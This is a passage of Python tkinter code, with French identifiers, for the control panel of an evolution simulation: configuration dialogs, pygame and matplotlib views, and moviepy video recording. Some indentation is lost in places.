        new_button.grid(row=3, column=0, columnspan=4, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        start_button.grid(row=0, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        stop_button.grid(row=0, column=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        delay_scale.grid(row=1, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="ew")
        info_frame.grid(row=2, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        self.tk_buttons_simulation = {START_BUTTON: start_button,
                                      NEW_BUTTON: new_button,
                                      STOP_BUTTON: stop_button}

    def init_tkinter_pygame_frame():
        # open/close buttons and an FPS scale for the pygame view
        new_button = tkinter.Button(pygame_frame,
                                    text=TK_NEW_BUTTON_TEXT,
                                    font=TK_BUTTON_FONT,
                                    command=self.new_pygame_fame)
        stop_button = tkinter.Button(pygame_frame,
                                     text=TK_STOP_BUTTON_TEXT,
                                     font=TK_BUTTON_FONT,
                                     command=self.stop_pygame,
                                     state="disabled")
        delay_scale = new_scale(pygame_frame, SCALE_PYGAME_FPS, self.var_fps_pygame)
        new_button.grid(row=0, column=0, sticky="nsew", padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET)
        stop_button.grid(row=0, column=1, sticky="nsew", padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET)
        delay_scale.grid(row=1, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="ew")
        self.tk_buttons_pygame = {NEW_BUTTON: new_button,
                                  STOP_BUTTON: stop_button}

    def init_tkinter_matplotlib_frame():
        # open/close buttons, an FPS scale and a video-export (moviepy) button
        start_button = tkinter.Button(matplotlib_frame,
                                      text=TK_NEW_BUTTON_TEXT,
                                      font=TK_BUTTON_FONT,
                                      command=self.new_matplotlib_fame)
        stop_button = tkinter.Button(matplotlib_frame,
                                     text=TK_STOP_BUTTON_TEXT,
                                     font=TK_BUTTON_FONT,
                                     command=self.stop_matplotlib,
                                     state="disabled")
        delay_scale = new_scale(matplotlib_frame, SCALE_MATPLOTLIB_FPS, self.var_fps_matplotlib)
        new_moviepy_button = tkinter.Button(matplotlib_frame,
                                            text=TK_NEW_MOVIEPY_BUTTON_TEXT,
                                            font=TK_BUTTON_FONT,
                                            command=self.new_moviepy_frame,
                                            state="disabled")
        start_button.grid(row=0, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        stop_button.grid(row=0, column=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        delay_scale.grid(row=1, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="ew")
        new_moviepy_button.grid(row=2, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET,
                                sticky="nsew")
        self.tk_buttons_matplotbil = {START_BUTTON: start_button,
                                      STOP_BUTTON: stop_button,
                                      NEW_BUTTON: new_moviepy_button}

    init_tkinter_simulation_frame()
    init_tkinter_pygame_frame()
    init_tkinter_matplotlib_frame()
    button_quitter = tkinter.Button(self.app,
                                    text=TK_QUITTER_BUTTON_TEXT,
                                    font=TK_BUTTON_FONT,
                                    command=self.quitter)
    # overall grid: narrow left column (simulation), wide right column (views)
    for i, weight in enumerate([1, 5]):
        self.app.columnconfigure(i, weight=weight)
    for i, weight in enumerate([1, 20, 19, 1]):
        self.app.rowconfigure(i, weight=weight)
    title.grid(row=0, column=0, columnspan=2, sticky="nsew")
    simulation_frame.grid(row=1, column=0, rowspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
    pygame_frame.grid(row=1, column=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
    matplotlib_frame.grid(row=2, column=1, rowspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
    button_quitter.grid(row=3, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
def run(self):
    """Enter the tkinter main event loop (blocks until the app quits)."""
    self.app.mainloop()
def quitter(self):
    """Stop every running view, ask the user for confirmation, and shut
    the application down if confirmed."""
    self.stop_simulation()
    self.stop_pygame()
    self.stop_matplotlib()
    # guard clause: keep the app alive when the user declines
    if not messagebox.askyesno(*TK_MESSAGE_BOX_QUITTER):
        return
    self.stop_enregistrement.set(True)
    self.app.quit()
    self.app = None
# Tkinter function : Pour les configurations => new_simulation_frame() et new_pygame_fame()
def tk_conf_frame(self, master_frame, command_valider, list_configs: list, list_type_label_frame: list,
                  frame_size: str, title: str, buttons_frame_weights: list, configs_caracteres: bool = False,
                  button_master=None):
    """Open a configuration dialog (Toplevel) for the configs in
    `list_configs`, grouped into the label-frames of `list_type_label_frame`.

    On "validate" the chosen values are (optionally) persisted into
    self.tk_valeurs_configurations / self.tk_valeurs_caracteres_individus
    and `command_valider` is called with plain dicts of the values.
    `button_master`, when given, is disabled while the dialog is open and
    re-enabled when it closes.

    Returns (buttons_frame, dic_tkvar[, dic_tkvar_caractere]) so the caller
    can add extra widgets to the "advanced" area.
    """
    # one tk Variable per config, typed after the config's declared PARAM_TYPE
    dic_tkvar = {
        conf: tkinter.IntVar(value=self.tk_valeurs_configurations[conf])
        if DIC_CONFIGURATIONS[conf][PARAM_TYPE] == int
        else (tkinter.BooleanVar(value=self.tk_valeurs_configurations[conf])
              if DIC_CONFIGURATIONS[conf][PARAM_TYPE] == bool
              else tkinter.DoubleVar(value=self.tk_valeurs_configurations[conf]))
        for conf in list_configs}
    dic_tkvar_caractere = {}
    if configs_caracteres:
        # same idea for the per-characteristic parameters of individuals;
        # mutation probability is always a float, the "random" flag a bool
        dic_tkvar_caractere = {
            caractere: {
                param: tkinter.IntVar(value=value) if (DIC_CARACTERES_INDIVIDU[caractere][PARAM_TYPE] == int
                                                       and not param == PARAM_PROBA_MUTATION)
                else (tkinter.BooleanVar(value=value)
                      if param == PARAM_ALEATOIRE else tkinter.DoubleVar(value=value))
                for param, value in dic_params.items()}
            for caractere, dic_params in self.tk_valeurs_caracteres_individus.items()}

    def command_button_valider():
        # persist the values only when the "keep configuration" box is checked
        if check_value.get():
            for conf, var in dic_tkvar.items():
                self.tk_valeurs_configurations[conf] = var.get()
            if configs_caracteres:
                for car, dic in dic_tkvar_caractere.items():
                    for param, var in dic.items():
                        self.tk_valeurs_caracteres_individus[car][param] = var.get()
        if button_master is not None:
            button_master["state"] = "normal"
        frame.destroy()
        # hand plain value dicts (not tk Variables) to the caller's callback
        if configs_caracteres:
            command_valider({conf: var.get() for conf, var in dic_tkvar.items()},
                            {car: {conf: var.get() for conf, var in dic.items()}
                             for car, dic in dic_tkvar_caractere.items()})
        else:
            command_valider({conf: var.get() for conf, var in dic_tkvar.items()})

    def command_button_reset():
        # restore every widget to the declared default values
        for conf, var in dic_tkvar.items():
            var.set(DIC_CONFIGURATIONS[conf][PARAM_DEFAULT_VALUE])
        if configs_caracteres:
            for car, dic in dic_tkvar_caractere.items():
                for param, var in dic.items():
                    var.set(DIC_CARACTERES_INDIVIDU[car][param])

    def command_quitter():
        # cancel: close without persisting or invoking the callback
        frame.destroy()
        if button_master is not None:
            button_master["state"] = "normal"

    if button_master is not None:
        button_master["state"] = "disabled"
    # rows: title + one per label-frame + advanced area + checkbox + buttons
    nb_rows = (4 + len(list_type_label_frame))
    frame = new_top_frame(master_frame, frame_size, TK_CAPTION_TEXT, title, [1] * nb_rows, [1, 1, 1])
    frame.protocol("WM_DELETE_WINDOW", command_quitter)
    for i, type_label_frame in enumerate(list_type_label_frame):
        label_frame = new_config_label_frame(frame, dic_tkvar, type_label_frame)
        label_frame.grid(row=1 + i, column=0, columnspan=3,
                         padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
    # empty "advanced configuration" area returned to the caller to fill
    buttons_frame = new_label_frame(frame, TK_CONFIG_AVANCES_TEXT, *buttons_frame_weights)
    check_value = tkinter.BooleanVar()
    check_value.set(True)
    check_button = tkinter.Checkbutton(frame,
                                       text=TK_CHECKBUTTON_KEEP_CONF,
                                       font=TK_LABEL_FONT,
                                       variable=check_value)
    button_valider = tkinter.Button(frame,
                                    text=TK_VALIDER_BUTTON_TEXT,
                                    font=TK_BUTTON_FONT,
                                    command=command_button_valider)
    button_reset = tkinter.Button(frame,
                                  text=TK_RESET_BUTTON_TEXT,
                                  font=TK_BUTTON_FONT,
                                  command=command_button_reset)
    button_annuler = tkinter.Button(frame,
                                    text=TK_ANNULER_BUTTON_TEXT,
                                    font=TK_BUTTON_FONT,
                                    command=command_quitter)
    buttons_frame.grid(row=nb_rows - 3, column=0, columnspan=3, pady=TK_MARGE_WIDGET,
                       padx=TK_MARGE_WIDGET, sticky="nsew")
    check_button.grid(row=nb_rows - 2, column=0, columnspan=3, padx=TK_MARGE_WIDGET, sticky="nsw")
    button_annuler.grid(row=nb_rows - 1, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
    button_reset.grid(row=nb_rows - 1, column=1, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
    button_valider.grid(row=nb_rows - 1, column=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
    if configs_caracteres:
        return buttons_frame, dic_tkvar, dic_tkvar_caractere
    return buttons_frame, dic_tkvar
# Simulation
    def new_simulation_frame(self):
        """Open the "new simulation" configuration window.

        Builds the common configuration frame via tk_conf_frame() (which calls
        self.new_simulation on validation) and adds three buttons opening
        secondary windows: advanced map/food settings, advanced individual
        settings, and per-"caractere" (trait) settings.
        """
        avancees_frame_configurations, dic_tkvar, dic_tkvar_caracteres = \
            self.tk_conf_frame(self.app, self.new_simulation, LISTE_CONFIGS_SIMULATION_ONLY,
                               [FRAME_GENERAL, FRAME_DEPART], TK_CONFIG_FRAME_SIZE, TK_TITLE_CONF_TEXT,
                               [[1], [1, 1, 1]], True, self.tk_buttons_simulation[NEW_BUTTON])

        def fame_conf_avancees():
            # Secondary window: advanced map / altitude / food settings.
            def quitte_fame_conf_avancees():
                frame_conf_avancees.destroy()
                button_avancees["state"] = "normal"

            # Disable the opener button while its window is alive.
            button_avancees["state"] = "disabled"
            frame_conf_avancees = new_top_frame(avancees_frame_configurations, TK_CONFIG_AVANCEES_FRAME_SIZE,
                                                TK_CAPTION_TEXT, TK_TITLE_CONF_TEXT, [1, 6], [1, 1, 1])
            frame_conf_avancees.protocol("WM_DELETE_WINDOW", quitte_fame_conf_avancees)
            for i, type_frame in enumerate([FRAME_AVANCEES_CARTE,
                                            FRAME_AVANCEES_CARTE_ALTITUDES,
                                            FRAME_AVANCEES_NOURRITURE]):
                label_frame = new_config_label_frame(frame_conf_avancees, dic_tkvar, type_frame)
                label_frame.grid(column=i, row=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")

        def fame_conf_caracteres():
            # Secondary window: one column per trait parameter (label, value,
            # min/max, mutation degree/probability), one row per trait.
            def quitte_fame_conf_avancees():
                frame_conf_caractere.destroy()
                button_caracteres["state"] = "normal"

            button_caracteres["state"] = "disabled"
            frame_conf_caractere = new_top_frame(avancees_frame_configurations, TK_CONFIG_CARACTERES_FRAME_SIZE,
                                                 TK_CAPTION_TEXT, TK_TITLE_CONF_TEXT, [1, 6],
                                                 [1] * len(LISTE_PARAM_CARACTERES_INDIVIDUS_TITLE))
            frame_conf_caractere.protocol("WM_DELETE_WINDOW", quitte_fame_conf_avancees)
            for i, (param, title) in enumerate(LISTE_PARAM_CARACTERES_INDIVIDUS_TITLE):
                if param == PARAM_VALUE:
                    # Extra column for the per-trait "random value" checkbutton.
                    frame = new_label_frame(frame_conf_caractere, title, [1] * len(LISTE_CARACTERES_INDIVIDU), [1, 2])
                else:
                    frame = new_label_frame(frame_conf_caractere, title, [1] * len(LISTE_CARACTERES_INDIVIDU), [1])
                for j, caractere in enumerate(LISTE_CARACTERES_INDIVIDU):
                    if param == PARAM_LABEL:
                        label = tkinter.Label(frame,
                                              text=DIC_CARACTERES_INDIVIDU[caractere][PARAM_LABEL],
                                              font=TK_LABEL_FONT)
                        label.grid(column=0, row=j)
                    else:
                        # Pick the scale bounds and step matching the parameter kind.
                        if param in [PARAM_VALUE, PARAM_MIN_VALUE, PARAM_MAX_VALUE]:
                            from_ = DIC_CARACTERES_INDIVIDU[caractere][PARAM_MIN_VALUE]
                            to = DIC_CARACTERES_INDIVIDU[caractere][PARAM_MAX_VALUE]
                            resolution = DIC_CARACTERES_INDIVIDU[caractere][PARAM_STEP]
                        elif param == PARAM_DEGRE_MUTATION:
                            from_ = DIC_CARACTERES_INDIVIDU[caractere][PARAM_DEGRE_MUTATION_MIN]
                            to = DIC_CARACTERES_INDIVIDU[caractere][PARAM_DEGRE_MUTATION_MAX]
                            resolution = DIC_CARACTERES_INDIVIDU[caractere][PARAM_DEGRE_MUTATION_STEP]
                        else:
                            # Remaining case: mutation probability.
                            from_ = PROBA_MUTATION_MIN
                            to = PROBA_MUTATION_MAX
                            resolution = PROBA_MUTATION_STEP
                        scale = tkinter.Scale(frame,
                                              orient="horizontal",
                                              from_=from_,
                                              to=to,
                                              resolution=resolution,
                                              font=TK_LABEL_FONT,
                                              variable=dic_tkvar_caracteres[caractere][param])
                        if param == PARAM_VALUE:
                            checkbutton = tkinter.Checkbutton(frame,
                                                              variable=dic_tkvar_caracteres[caractere][PARAM_ALEATOIRE])
                            checkbutton.grid(column=0, row=j, padx=TK_MARGE_WIDGET // 2, pady=TK_MARGE_WIDGET,
                                             sticky="nsew")
                            scale.grid(column=1, row=j, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
                        else:
                            scale.grid(column=0, row=j, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
                frame.grid(column=i, row=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")

        def fame_conf_individu():
            # Secondary window: advanced per-individual settings.
            def quitte_fame_conf_avancees():
                frame_conf_individus.destroy()
                button_individus["state"] = "normal"

            button_individus["state"] = "disabled"
            frame_conf_individus = new_top_frame(avancees_frame_configurations, TK_CONFIG_INDIVIDUS_FRAME_SIZE,
                                                 TK_CAPTION_TEXT, TK_TITLE_CONF_TEXT, [1, 6], [1])
            frame_conf_individus.protocol("WM_DELETE_WINDOW", quitte_fame_conf_avancees)
            label_frame = new_config_label_frame(frame_conf_individus, dic_tkvar, FRAME_AVANCEES_INDIVIDUS)
            label_frame.grid(column=0, row=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")

        # The three opener buttons live in the frame returned by tk_conf_frame().
        button_avancees = tkinter.Button(avancees_frame_configurations,
                                         text=TK_CONFIG_AVANCEES_BUTTON_TEXT,
                                         font=TK_BUTTON_FONT,
                                         command=fame_conf_avancees)
        button_individus = tkinter.Button(avancees_frame_configurations,
                                          text=TK_CONFIG_INDIVIDUS_BUTTON_TEXT,
                                          font=TK_BUTTON_FONT,
                                          command=fame_conf_individu)
        button_caracteres = tkinter.Button(avancees_frame_configurations,
                                           text=TK_CONFIG_CARACTERE_BUTTON_TEXT,
                                           font=TK_BUTTON_FONT,
                                           command=fame_conf_caracteres)
        button_avancees.grid(column=0, row=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        button_individus.grid(column=1, row=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        button_caracteres.grid(column=2, row=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
def new_simulation(self, dic_configurations: dict, dic_conf_caracteres: dict):
self.stop_simulation()
self.stop_pygame()
self.stop_matplotlib()
message_confirmation = messagebox.askyesno(*TK_MESSAGE_BOX_NOUVEAU)
if message_confirmation:
thread_new_environnement = Thread(target=self.new_environnement, args=[dic_configurations,
dic_conf_caracteres])
thread_new_environnement.start()
def start_simulation(self):
if not self.running_simu:
self.running_simu = True
thread_simu = Thread(target=self.run_simulation)
thread_simu.start()
self.tk_buttons_simulation[START_BUTTON]["state"] = "disabled"
self.tk_buttons_simulation[STOP_BUTTON]["state"] = "normal"
def stop_simulation(self):
if self.tk_var_stop_init_new_environnement is not None:
self.tk_var_stop_init_new_environnement.set(True)
if self.running_simu:
self.running_simu = False
self.tk_buttons_simulation[START_BUTTON]["state"] = "normal"
self.tk_buttons_simulation[STOP_BUTTON]["state"] = "disabled"
# Pygame
    def new_pygame_fame(self):
        """Open the Pygame display configuration window.

        tk_conf_frame() builds the main settings (and calls self.new_pygame on
        validation); an extra button opens the advanced display settings.
        """
        avancees_frame_new_pygame, dic_tkvar = self.tk_conf_frame(self.app, self.new_pygame, LISTE_CONFIGS_PYGAME_ONLY,
                                                                  [FRAME_PYGAME_GENERAL], TK_PYGAME_FRAME_SIZE,
                                                                  TK_TITLE_PYGAME_TEXT, [[1], [1]],
                                                                  button_master=self.tk_buttons_pygame[NEW_BUTTON])

        def pygame_fame_conf_avancees():
            # Secondary window with the advanced Pygame settings.
            def quitte_fame_conf_avancees():
                frame_new_pygame_avancees.destroy()
                button_avancees["state"] = "normal"

            # Disable the opener button while its window is alive.
            button_avancees["state"] = "disabled"
            frame_new_pygame_avancees = new_top_frame(avancees_frame_new_pygame, TK_PYGAME_FRAME_AVANCEE_SIZE,
                                                      TK_CAPTION_TEXT, TK_TITLE_PYGAME_TEXT, [1, 1], [1])
            frame_new_pygame_avancees.protocol("WM_DELETE_WINDOW", quitte_fame_conf_avancees)
            avancees_frame = new_config_label_frame(frame_new_pygame_avancees, dic_tkvar, FRAME_PYGAME_AVANCEES)
            avancees_frame.grid(row=1, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")

        button_avancees = tkinter.Button(avancees_frame_new_pygame,
                                         text=TK_CONFIG_AVANCEES_BUTTON_TEXT,
                                         font=TK_BUTTON_FONT,
                                         command=pygame_fame_conf_avancees)
        button_avancees.grid(row=2, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
def new_pygame(self, dic_configurations):
if not self.running_pygame:
self.running_pygame = True
thread_pygame = Thread(target=self.run_affichage_pygame, args=[dic_configurations])
thread_pygame.start()
self.tk_buttons_pygame[NEW_BUTTON]["state"] = "disabled"
self.tk_buttons_pygame[STOP_BUTTON]["state"] = "normal"
def stop_pygame(self):
if self.running_pygame:
self.running_pygame = False
self.tk_buttons_pygame[NEW_BUTTON]["state"] = "normal"
self.tk_buttons_pygame[STOP_BUTTON]["state"] = "disabled"
# Matplotlib
    def new_matplotlib_fame(self):
        """Open the matplotlib graph configuration window.

        Lets the user choose between the population graph and a 3D trait graph
        (three trait axes, rotation speed, z height) and then calls
        self.new_matplotlib on validation.
        """
        def observeur_radiobutton_graph(*_):
            # The 3D sub-frame only makes sense for the 3D graph: grey it out
            # when the population graph is selected.
            if var_graph.get():
                for child in frame_3D.winfo_children():
                    child.configure(state="disable")
            else:
                for child in frame_3D.winfo_children():
                    if child.winfo_class() == "TCombobox":
                        child.configure(state="readonly")
                    else:
                        child.configure(state="normal")

        def command_button_valider():
            # Map each combobox index back to its trait constant before
            # handing everything to new_matplotlib(), then close the window.
            self.new_matplotlib(var_graph.get(),
                                [(LISTE_CARACTERES_INDIVIDU + LISTE_CARACTERES_INDIVIDU_SECONDAIRES)[ld.current()]
                                 for ld in liste_listes_deroulantes], tk_var_vitesse_rotation.get(),
                                tk_var_hauteur_z.get())
            frame_new_matplotlib.destroy()

        frame_new_matplotlib = new_top_frame(self.app, TK_MATPLOTLIB_FRAME_SIZE, TK_CAPTION_TEXT, TK_TITLE_MATPLOT_TEXT,
                                             [1, 1, 1, 1], [1, 1, 1])
        frame_new_matplotlib.protocol("WM_DELETE_WINDOW", frame_new_matplotlib.destroy)
        var_graph = tkinter.BooleanVar(frame_new_matplotlib, value=False)
        var_graph.trace("w", observeur_radiobutton_graph)
        graph_pop = tkinter.Radiobutton(frame_new_matplotlib,
                                        text=TK_MATPLOT_RADIOBUTTON_POPULATION_TEXT,
                                        font=TK_LABEL_FONT,
                                        value=True,
                                        variable=var_graph)
        graph_3D = tkinter.Radiobutton(frame_new_matplotlib,
                                       text=TK_MATPLOT_RADIOBUTTON_3D_TEXT,
                                       font=TK_LABEL_FONT,
                                       value=False,
                                       variable=var_graph)
        button_valider = tkinter.Button(frame_new_matplotlib,
                                        text=TK_VALIDER_BUTTON_TEXT,
                                        font=TK_BUTTON_FONT,
                                        command=command_button_valider)
        button_annuler = tkinter.Button(frame_new_matplotlib,
                                        text=TK_ANNULER_BUTTON_TEXT,
                                        font=TK_BUTTON_FONT,
                                        command=frame_new_matplotlib.destroy)
        frame_3D = new_label_frame(frame_new_matplotlib, "", [1] * 5, [1, 1])
        list_caracteres = [DIC_CARACTERES_INDIVIDU[caractere][PARAM_LABEL]
                           for caractere in LISTE_CARACTERES_INDIVIDU + LISTE_CARACTERES_INDIVIDU_SECONDAIRES]
        liste_listes_deroulantes = []
        # One labelled combobox per 3D axis; default selection = axis index.
        for i, title in enumerate(TK_LABELS_MATPLOT_AXES):
            text_label = tkinter.Label(frame_3D,
                                       text=title,
                                       font=TK_LABEL_FONT)
            text_label.grid(row=i,
                            column=0,
                            sticky="nsew")
            liste_deroulante = ttk.Combobox(frame_3D,
                                            values=list_caracteres,
                                            state="readonly",
                                            font=TK_LABEL_FONT)
            liste_deroulante.current(i)
            liste_deroulante.grid(row=i, column=1, sticky="nsew", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
            liste_listes_deroulantes.append(liste_deroulante)
        tk_var_vitesse_rotation = tkinter.DoubleVar(frame_3D)
        tk_var_hauteur_z = tkinter.IntVar(frame_3D)
        for row, variable, type_scale in [(3, tk_var_vitesse_rotation, SCALE_MATPLOTLIB_3D_VITESSE_ROTATION),
                                          (4, tk_var_hauteur_z, SCALE_MATPLOTLIB_3D_HAUTEUR_Z)]:
            scale = new_scale(frame_3D, type_scale, variable)
            variable.set(DIC_SCALE[type_scale][PARAM_DEFAULT_VALUE])
            scale.grid(row=row, column=0, columnspan=2, sticky="nsew", padx=TK_MARGE_WIDGET)
        graph_pop.grid(row=1, column=0, columnspan=3, sticky="nsw", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
        graph_3D.grid(row=2, column=0, sticky="nw", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
        button_annuler.grid(row=3, column=0, columnspan=2, sticky="nsew", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
        button_valider.grid(row=3, column=2, sticky="nsew", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
        frame_3D.grid(row=2, column=1, columnspan=2, sticky="nsew", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
        # Default choice: population graph (the trace above then greys out the
        # 3D sub-frame).
        var_graph.set(True)
    def new_matplotlib(self, graph: bool, caractere_3D: list, vitesse_rotate: float, hauteur_z: int):
        """Start the matplotlib worker thread showing one figure.

        graph: True for the population graph, False for the 3D trait graph.
        caractere_3D: the three traits used as axes of the 3D graph.
        vitesse_rotate / hauteur_z: 3D view rotation speed and z elevation.
        """
        if not self.running_matplotbil:
            self.running_matplotbil = True
            thread_matplotbil = Thread(target=self.run_graphs_matplotlib,
                                       args=[graph, caractere_3D, vitesse_rotate, hauteur_z])
            thread_matplotbil.start()
            # NOTE(review): NEW is set to "normal" here (the sibling methods
            # start_simulation/new_pygame disable their opener button at this
            # point) -- presumably to allow several figures at once, since
            # run_graphs_matplotlib appends to list_id_figs_matplotlib. Confirm.
            self.tk_buttons_matplotbil[STOP_BUTTON]["state"] = "normal"
            self.tk_buttons_matplotbil[NEW_BUTTON]["state"] = "normal"
    def stop_matplotlib(self):
        """Stop the matplotlib worker loop and disable both matplotlib buttons.

        NOTE(review): NEW is disabled here whereas the other stop_* methods
        re-enable their opener button -- new_environnement appears to re-enable
        the matplotlib button afterwards; confirm this is intended.
        """
        if self.running_matplotbil:
            self.running_matplotbil = False
            self.tk_buttons_matplotbil[STOP_BUTTON]["state"] = "disabled"
            self.tk_buttons_matplotbil[NEW_BUTTON]["state"] = "disabled"
# Moviepy
    def new_moviepy_frame(self):
        """Open the video-recording (moviepy) window for a matplotlib figure.

        The single button `button_sss` cycles through three actions driven by
        the contents of `id_dossier_fig`:
        [] -> start recording; [recording id] -> stop recording;
        [recording id, image dir] -> save the video file.
        """
        # Recording state shared by the closures below (see docstring).
        id_dossier_fig = []

        def liste_figures_matplotlib():
            # Display names of the currently open matplotlib figures.
            return [f"Figure {id_f}" for id_f in self.list_id_figs_matplotlib]

        def observeur_nb_figures_matplotlib(*_):
            # Keep the figure combobox in sync; close the whole window when the
            # last figure disappears.
            liste = liste_figures_matplotlib()
            if len(liste) == 0:
                quitter()
            else:
                liste_deroulante["values"] = liste

        def observeur_nb_jours(*_):
            # Refresh the image counter and estimated video duration; also
            # re-enables button_sss (it is disabled when recording starts, until
            # the first day tick).
            label_nb_images["text"] = TK_LABEL_MOVIEPY_NB_IMAGES + str(var_nb_jours.get())
            label_duree["text"] = (TK_LABEL_MOVIEPY_DUREE_ENREGISTREMENT[0] +
                                   str(round(var_nb_jours.get() / tk_fps_moviepy.get(), 2)) +
                                   TK_LABEL_MOVIEPY_DUREE_ENREGISTREMENT[1])
            button_sss["state"] = "normal"

        def observateur_affiche_miniature(*_):
            # The miniature scales only make sense when the miniature is shown.
            if tk_affiche_miniature.get():
                scale_size_miniature["state"] = "normal"
                scale_coef_froid["state"] = "normal"
            else:
                scale_size_miniature["state"] = "disabled"
                scale_coef_froid["state"] = "disabled"

        def command_button_sss():
            # Start -> Stop -> Save, depending on how far the recording has gone.
            if len(id_dossier_fig) == 0:
                # Start: freeze every image-related widget, drop the traces that
                # would fight with the recording, then register it.
                for child in frame_images.winfo_children():
                    if child in [frame_radiobuttons, frame_miniature]:
                        for child_child in child.winfo_children():
                            child_child.configure(state="disable")
                    else:
                        child.configure(state="disable")
                button_sss.config(text=TK_STOP_BUTTON_TEXT, state="disabled")
                self.tk_nb_figs_matplotlib.trace_remove("write", cbname_observeur)
                tk_affiche_miniature.trace_remove("write", cbname_observeur_miniature)
                id_fig = self.new_moviepy(self.list_id_figs_matplotlib[liste_deroulante.current()],
                                          tk_periode_image.get(), var_nb_jours, tk_resolution.get(),
                                          tk_affiche_miniature.get(), scale_size_miniature.get(),
                                          scale_coef_froid.get())
                id_dossier_fig.append(id_fig)
            elif len(id_dossier_fig) == 1:
                # Stop: unregister the recording, keep its image directory.
                nom_dossier = self.stop_moviepy(id_dossier_fig[0])
                button_sss["text"] = TK_SAUVER_BUTTON_TEXT
                id_dossier_fig.append(nom_dossier)
            else:
                # Save: ask for a target file, then write the video in a thread.
                nom_fichier = id_dossier_fig[1].split("/")[-1]
                emplacement_fichier_mp3 = filedialog.asksaveasfile(parent=frame_new_moviepy,
                                                                   defaultextension=FORMAT_VIDEOS,
                                                                   initialdir=id_dossier_fig[1][:-len(nom_fichier)],
                                                                   initialfile=f"{nom_fichier}{FORMAT_VIDEOS}",
                                                                   title=TK_TITLE_MOVIEPY_ENREGISTREMENT_BROWSE_TEXT,
                                                                   filetypes=TK_FILESTYPES_BROWSE_SAVE_VIDEO)
                if emplacement_fichier_mp3 is not None:
                    thread_save_moviepy = Thread(target=self.save_moviepy, args=[emplacement_fichier_mp3.name,
                                                                                 id_dossier_fig[1],
                                                                                 tk_fps_moviepy.get(),
                                                                                 var_nb_jours.get(),
                                                                                 keep_images.get()])
                    thread_save_moviepy.start()
                    frame_new_moviepy.destroy()
                    self.stop_enregistrement.trace_remove("write", observeur_stop_enregistrement)

        def stop_enregistrement(*_):
            # External request (e.g. new environment) to abort the recording.
            if self.stop_enregistrement.get():
                quitter(True)

        def quitter(forcer=False):
            # Close the window; if a recording is in progress, ask for
            # confirmation (unless `forcer`) and clean up the written images.
            if len(id_dossier_fig) == 0:
                frame_new_moviepy.destroy()
                self.tk_nb_figs_matplotlib.trace_remove("write", cbname_observeur)
                self.stop_enregistrement.trace_remove("write", observeur_stop_enregistrement)
            else:
                stop = False
                if forcer:
                    stop = True
                else:
                    message_confirmation = messagebox.askyesno(*TK_MESSAGE_BOX_ENREGISTEMENT, parent=frame_new_moviepy)
                    if message_confirmation:
                        stop = True
                if stop:
                    if len(id_dossier_fig) == 1:
                        # Still recording: unregister first, then wipe images.
                        nom_dossier = self.stop_moviepy(id_dossier_fig[0])
                        clear_images_moviepy(nom_dossier, var_nb_jours.get())
                    elif len(id_dossier_fig) == 2:
                        clear_images_moviepy(id_dossier_fig[1], var_nb_jours.get())
                    frame_new_moviepy.destroy()
                    self.stop_enregistrement.trace_remove("write", observeur_stop_enregistrement)

        frame_new_moviepy = new_top_frame(self.app, TK_MOVIEPY_FRAME_SIZE, TK_CAPTION_TEXT, TK_TITLE_MOVIEPY_TEXT,
                                          [1] * 5, [1, 1])
        cbname_observeur = self.tk_nb_figs_matplotlib.trace_add("write", observeur_nb_figures_matplotlib)
        observeur_stop_enregistrement = self.stop_enregistrement.trace_add("write", stop_enregistrement)
        frame_new_moviepy.protocol("WM_DELETE_WINDOW", quitter)
        tk_fps_moviepy = tkinter.IntVar(frame_new_moviepy, DIC_SCALE[SCALE_MOVIEPY_FPS][PARAM_DEFAULT_VALUE])
        keep_images = tkinter.BooleanVar(frame_new_moviepy, False)
